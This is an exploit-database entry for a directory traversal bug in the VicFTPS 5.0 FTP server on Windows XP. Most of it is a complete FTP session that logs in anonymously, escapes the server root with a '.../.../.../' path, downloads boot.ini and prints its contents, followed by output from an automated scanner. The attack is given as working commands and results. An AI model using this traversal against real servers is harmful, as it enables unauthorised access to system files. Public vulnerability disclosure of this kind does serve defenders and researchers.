VicFTPS 5.0 – Directory Traversal

• Exploit Database
• 14 阅读

• 作者： chr1x
  日期： 2010-05-04
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12498/

• ################################################################################
  #
  # +------------------------------------------------------------------------+
  # | .......|
  # | ..''xxxxxxxxxxxxxxx'...|
  # |..'xxxxxxxxxxxxxxxxxxxxxxxxxxx..|
  # | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
  # | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
  # | .'xxxxxxxxxxxxxxxxxxxxx''........... |
  # |.xxxxxxxxxxxxxxxxxx'... .........'. |
  # | 'xxxxxxxxxxxxxxx'......'.|
  # |'xxxxxxxxxxxxxx'..'x...x. |
  # | .xxxxxxxxxxxx'...'..... .' |
  # | 'xxxxxxxxx'......x.|
  # | xxxxxxx'...x.|
  # | xxxx'.....xx.|
  # | 'x'....'xxxxxxx'. x .x.|
  # | .x'. .'xxxxxxxxxxxxxx. '' .' |
  # |.xx..'xxxxxxxxxxxxxxxx. .'xx'''..'|
  # | .xx..'xxxxxxxxxxxxxxxx'.'xxxxxxxxx''.|
  # |.'xx'..'xxxxxxxxxxxxxxx...'xxxxxxxxxxxx'|
  # |.xxx'..xxxxxxxxxxxx'..'xxxxxxxxxxxxxx'. |
  # |.xxxx'.'xxxxxxxxx'.xxx'xxxxxxxxxx'. |
  # |.'xxxxxxx'.......xxxxxxx'.|
  # | ..'xxxxx'.. ..xxxxx'.. |
  # |....'xx'.....''''...|
  # ||
  # |CubilFelino Security Research Labs|
  # |proudly presents... |
  # +------------------------------------------------------------------------+
  #
  # VicFTPS v5.0 Directory Traversal
  #
  #
  # Greets: l1l1th, hkm, nitr0us, alt3kx, r1l0, b0rr3x, w01f, ax0us
  # gh0st, CHiP, Jorge Mieres and ygjb.
  #
  ################################################################################
   
  # Exploit Title: VicFTPS v5.0 Directory Traversal
  # Date: May 05, 2010
  # Author: chr1x
  # Description: A simple FTP server for Windows. Does not require an install. Very simple to configure. Supports only one user connection at a time. Supports active and passive mode transfers, MDTM, SIZE, and PASS. Version 5.0 fixed CWD Buffer overflow vulnerability. <- A new vuln here! :D
  # Version: 5.0
  # Tested on: Windows XP SP3 (Spanish Edition)
  
  #########<VULN CONFIRMATION>#########################################
  root@olovely:/ddpwn# ftp
  ftp> open
  (to) 192.168.1.64
  Connected to 192.168.1.64.
  220 VicFTPS ready
  Name (192.168.1.64:ninja): anonymous
  331 pretend login accepted
  Password:
  230 fake user logged in
  Remote system type is WIN32.
  ftp> ascii
  200 Type set to I
  ftp> cd .../.../.../
  250 CWD command successful
  ftp> pwd
  257 "/../../"
  ftp> get boot.ini
  local: boot.ini remote: boot.ini
  200 PORT command successful
  150 Opening BINARY mode data connection
  226 Transfer Complete
  211 bytes received in 0.00 secs (92.1 kB/s)
  ftp> bye
  221 goodbye
  
  root@olovely:/ddpwn# cat boot.ini
  [boot loader]
  timeout=30
  default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
  [operating systems]
  multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
  root@olovely:/ddpwn#
  
  #########</VULN CONFIRMATION>#########################################
  
  Shot from DDPwNv1.0
  [*] Testing Path: .../.../.../<- VULNERABLE! :P
  
  Thiz v00d00 t00l just r0x! Ninjutzu automated hacking babe! lol.
  
  http://chr1x.sectester.net